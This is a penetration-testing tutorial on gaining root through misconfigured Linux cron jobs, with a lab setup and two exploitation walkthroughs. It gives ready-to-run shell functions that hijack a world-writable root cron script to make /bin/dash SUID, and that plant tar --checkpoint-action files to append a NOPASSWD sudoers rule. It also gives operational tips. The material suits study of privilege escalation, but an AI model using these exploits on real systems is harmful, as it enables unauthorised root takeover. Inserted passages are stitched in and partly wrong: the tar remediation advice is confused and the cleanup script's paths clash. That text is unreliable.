Linux Privilege Escalation by Exploiting Cronjobs

After solving several OSCP challenges we decided to write this article on the various methods used for Linux privilege escalation, which should be helpful to readers in their penetration testing projects. In this article we cover privilege escalation by exploiting cron jobs to gain root access on a remote host, and examine how a badly implemented cron job leads to privilege escalation. If you have solved post-exploitation CTF challenges, this article will make the loopholes that lead to privilege escalation easy to recognise.

For details, you can read our previous articles where we applied this trick for privilege escalation. Open the links given below:

Link1: Hack the Box Challenge: Europa Walkthrough

Link2: Hack the Milnet VM (CTF Challenge)

Table of contents

  • Introduction
  • Cron job
  • Crontab syntax
  • Crontab File overwrite
  • Lab Setup (Ubuntu)
  • Exploiting cron job (Kali Linux)
  • Crontab Tar wildcard Injection
  • Lab Setup (Ubuntu)
  • Exploiting cron job (Kali Linux)

Let’s Start!!!

What is a cron job?

Cron jobs schedule tasks by executing commands at specific dates and times on the server. They are most commonly used for sysadmin jobs such as backups or cleaning the /tmp/ directory. The name cron comes from the Greek word chronos (time); the table that lists the jobs is the crontab, and the system-wide one lives at /etc/crontab, with additional files under /etc/cron.d. Each line of a system crontab has five schedule fields (minute, hour, day of month, month, day of week), then the user the command runs as, then the command itself; per-user crontabs (crontab -e) omit the user field.

 

For example, inside the crontab we can add an entry that prints the Apache error log automatically every hour.

Crontab File overwrite

Lab Setup for Poorly configured cron job

Objective: set a new job with the help of crontab that runs a Python script which erases all data from a particular directory.

Let's assume cleanup is the directory whose data will be cleared automatically every two minutes, so we have saved some data inside /home/cleanup.

As you can observe from the given image, some files are stored inside the cleanup directory.

Now write a Python program in any other directory that deletes the data inside /home/cleanup, and give it full permissions. This world-writable script, run by root from cron, is the misconfiguration the rest of the section exploits:

chmod 777 cleanup.py

Finally, schedule a task with the help of crontab to run cleanup.py every two minutes.

Now let's verify the objective.

Cool!! It is working: as you can see, all the files have been deleted after two minutes.
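The lab setup above as a script, added here as an example; it is not the page's own cleanup.py or crontab entry. It assumes python3 as the interpreter, /home/cleanup.py as the script path and a system crontab entry (with the user column) appended by root. The page later quotes the deletion line as rm -r /tmp/*; this script deletes the contents of the configured cleanup directory, as the objective states:

```shell
# Added example (not the page's own cleanup.py or crontab entry): builds the
# "poorly configured cron job" lab. Assumptions: python3 is the interpreter,
# the script lives at /home/cleanup.py, and root appends the entry to /etc/crontab.

# Write the cleanup script to $1; it deletes everything inside directory $2.
make_cleanup_script() {
    script="$1"
    target="$2"
cat > "$script" <<EOF
#!/usr/bin/env python3
import os
import sys

# Lab script: wipe the contents of the cleanup directory. A root cron job that
# runs a shell command from a writable script is what the attacker hijacks later.
try:
    os.system('rm -r $target/*')
except Exception:
    sys.exit(1)
EOF
    # The misconfiguration: the script is world-writable yet executed by root.
    chmod 777 "$script"
}

# Print the system-crontab line that runs $1 every two minutes as root.
# Fields: minute hour day-of-month month day-of-week user command;
# "*/2" in the minute field means "every second minute".
cron_entry_for() {
    printf '*/2 * * * * root /usr/bin/python3 %s\n' "$1"
}

# As the administrator would do it on the Ubuntu lab host (needs root):
#   make_cleanup_script /home/cleanup.py /home/cleanup
#   cron_entry_for /home/cleanup.py >> /etc/crontab
```

The two functions take their paths as parameters so the same script can be rehearsed in a scratch directory before it is installed; note that the entry hard-codes the interpreter path, so the only thing an attacker can change is the script's contents, which chmod 777 allows.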

Post Exploitation

Start your attacking machine, compromise the target system first, and then move on to the privilege escalation stage. Suppose I successfully log in to the victim's machine through SSH and obtain a non-root user shell. Start by reading the system crontab and checking the permissions of every script it runs.

From the above step we notice that the crontab runs a Python script every two minutes as root, and that the script is writable by everyone. Now let's exploit it.

There are many ways to turn this into root access; in this method we set the SUID bit on /bin/dash. It is quite simple: open the script in an editor, for example nano cleanup.py, and replace the line that runs rm -r /tmp/* with a line that sets the SUID bit on /bin/dash.

After two minutes the cron job sets the SUID bit on /bin/dash, and when you run /bin/dash you get a shell with effective UID 0. dash keeps the elevated effective UID it was started with; a SUID copy of bash would additionally need its -p option to keep the privileges.
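The post-exploitation steps of this section (enumerate the crontab, spot the writable root job, replace its command, check the SUID bit) as shell functions, added here as an example; these are not the commands from the page. The crontab path is taken as a parameter so the functions can be tried against a copy; the script containing an os.system('rm -r ...') call, the sed pattern that matches it and /bin/dash as the target are assumptions about the lab:

```shell
# Added example, not the page's own commands: enumerate root cron jobs, find the
# writable script, hijack it, and check the result. Assumptions: the crontab path
# is a parameter (so a copy can be used), the lab script contains an
# os.system('rm -r ...') call, and /bin/dash is the binary to make SUID.

# Print "user<TAB>command" for each job in the system crontab file $1, skipping
# comments, blank lines and VAR=value lines. "@reboot"-style lines have a single
# schedule field instead of five.
cron_jobs() {
    awk '
        /^[[:space:]]*#/ { next }                         # comment
        NF == 0 { next }                                  # blank
        /^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=/ { next }   # environment setting
        {
            if ($1 ~ /^@/) { user = $2; first = 3 } else { user = $6; first = 7 }
            cmd = ""
            for (i = first; i <= NF; i++) cmd = cmd (i > first ? " " : "") $i
            print user "\t" cmd
        }' "$1"
}

# Among the jobs that run as root, print every absolute path in the command that
# names a regular file the current user can write to. Run this as the low-
# privileged user: as root everything is writable and the check says nothing.
writable_root_cron_files() {
    cron_jobs "$1" | awk -F'\t' '$1 == "root" { print $2 }' |
    tr ' ' '\n' | sort -u |
    while IFS= read -r arg; do
        case "$arg" in
            /*) [ -f "$arg" ] && [ -w "$arg" ] && printf '%s\n' "$arg" ;;
        esac
    done
    return 0
}

# Replace the rm line in script $1 with one that sets the SUID bit on /bin/dash.
# The file is overwritten in place (not moved) so its owner and mode are kept;
# cron will execute the new line as root on the next schedule.
inject_suid_payload() {
    patched=$(mktemp)
    sed "s#os.system('rm -r [^']*')#os.system('chmod u+s /bin/dash')#" "$1" > "$patched"
    cat "$patched" > "$1"
    rm -f "$patched"
    grep -q "chmod u+s /bin/dash" "$1"
}

# True once $1 carries the SUID bit (ls -l shows "rws" in the owner triplet).
is_suid() { [ -u "$1" ]; }

# Typical session on the target as the unprivileged user:
#   writable_root_cron_files /etc/crontab    # expected: /home/cleanup.py
#   inject_suid_payload /home/cleanup.py
#   sleep 120; is_suid /bin/dash && /bin/dash  # dash keeps euid 0; "id" shows euid=0(root)
```

The in-place overwrite matters: if /home itself is not writable you cannot replace the file with a new one, but you can still truncate and rewrite a file that is mode 777, which is exactly what an editor such as nano does. Leaving the rest of the script intact also keeps the job from failing noisily before the payload runs.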

Awesome!! We hit the goal.

Crontab Tar Wildcard Injection

Lab Setup

Objective: schedule a task with the help of crontab that takes a backup of the html directory with the tar archiver.

The directory you are going to back up must be one that the low-privileged user can write to (the lab gives it full permissions), because the attack works by creating files inside it.

Now schedule a task with the help of crontab that runs tar every minute to back up /html into /var/backups. For the wildcard injection shown later to work, the entry must hand tar an unquoted * that the shell expands inside that directory.

Let's verify that the schedule is working by listing /var/backups after a minute.

From the image below you can see that the html.tgz file has been generated after one minute.
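The backup job of this lab together with a local demonstration of why the unquoted * in it matters, added here as an example; it is not the page's own crontab entry. It assumes the job changes into /html before archiving * to /var/backups/html.tgz; the scratch directory and file names in the demonstration are constructed input:

```shell
# Added example (not the page's own crontab entry): the backup job of this lab,
# plus a local demonstration of why the unquoted "*" in it matters. Assumes the
# job changes into /html and archives "*" to /var/backups/html.tgz.

# System-crontab line: every minute, as root, archive whatever "*" expands to
# inside directory $1. The shell, not tar, expands the wildcard.
backup_cron_entry() {
    printf '* * * * * root cd %s && tar -zcf /var/backups/html.tgz *\n' "$1"
}

# What tar receives when "*" is expanded inside $1: bare file names, passed
# verbatim. A file named "--checkpoint=1" therefore arrives as an option; GNU tar
# accepts options anywhere on its command line, not only before the file list.
bare_glob_args() {
    ( cd "$1" && set -- * && printf '%s\n' "$@" )
}

# The same directory globbed by absolute path ("tar ... /html/*"): every
# argument now starts with "/", so tar treats all of them as paths. That variant
# is not exploitable by file names alone.
absolute_glob_args() {
    set -- "$1"/* && printf '%s\n' "$@"
}

# Local demonstration with constructed files:
#   d=$(mktemp -d); touch "$d/index.html"; touch -- "$d/--checkpoint=1"
#   bare_glob_args "$d"       # --checkpoint=1 and index.html
#   absolute_glob_args "$d"   # $d/--checkpoint=1 and $d/index.html
```

When auditing a crontab, the thing to look for is therefore not tar itself but a bare wildcard expanded in a directory untrusted users can write to; quoting the glob, passing an explicit file list, or using tar's --no-unquote style safeguards is not what fixes it, but ending the option list with -- before the file names and not letting untrusted users write into the backup source are.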

Post Exploitation

Start your attacking machine, compromise the target system first, and then move on to the privilege escalation stage. Suppose I successfully log in to the victim's machine through SSH and obtain a non-root user shell. Then open the crontab to see whether any job is scheduled.

cat /etc/crontab

Here we notice that the target has scheduled tar every minute and that the entry names root as the user, so the job runs as root. Let's try to exploit it.

Create three files in the directory being backed up to grant sudo rights to the logged-in user; this post-exploitation technique is known as wildcard injection. Two of the file names are tar options (a checkpoint, and a checkpoint action that executes a shell script) and the third is the shell script itself, which appends a sudoers rule for the user. When the cron job's shell expands *, those names are passed to tar as options.

After one minute the job grants sudo rights to the user ignite, as you can confirm from the image below.
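The wildcard injection above as a function, added here as an example rather than the page's own commands. It assumes the job is cd /html && tar -zcf /var/backups/html.tgz * run as root, that the low-privileged user is ignite, and that the target's tar is GNU tar (the checkpoint options are GNU extensions, so bsdtar is not affected):

```shell
# Added example, not the page's own commands: the wildcard injection against the
# backup job above. Assumes the job is "cd /html && tar -zcf /var/backups/html.tgz *"
# run as root, that the low-privileged user is ignite, and that tar is GNU tar
# (--checkpoint and --checkpoint-action are GNU extensions).

# Plant the three files in directory $1. The payload command is $2; by default it
# appends a sudoers rule for ignite, which is what the section achieves.
plant_tar_wildcard_payload() {
    dir="$1"
    payload="${2:-echo 'ignite ALL=(root) NOPASSWD: ALL' >> /etc/sudoers}"
    # The script tar will be told to execute; it runs as root via the cron job.
    printf '%s\n' "$payload" > "$dir/shell.sh"
    # File names the glob turns into tar options: take a checkpoint after every
    # record, and at each checkpoint run "sh shell.sh". Use "--" if you create
    # them by bare name from inside the directory, so touch does not parse them.
    touch -- "$dir/--checkpoint=1"
    touch -- "$dir/--checkpoint-action=exec=sh shell.sh"
}

# Reproduce what the cron job does, as the current user, writing the archive to
# $2 (keep it outside $1). The payload runs as a side effect of the archiving.
run_backup_like_cron() {
    ( cd "$1" && tar -zcf "$2" * )
}

# On the target:
#   plant_tar_wildcard_payload /html
#   sleep 60; sudo -l       # now lists (root) NOPASSWD: ALL for ignite
#   sudo su                 # root shell
```

Append to /etc/sudoers with >>, never >, and keep the rule syntactically valid: a broken sudoers file disables sudo for everyone, including you. A common alternative payload is chmod u+s /bin/bash, after which bash -p gives the root shell. The rehearsal function is worth running against a copy of the directory first, to confirm that the installed tar honours the planted options before you rely on the one-minute window.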

YUPPIEEEE!!! We have successfully obtained root access.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.
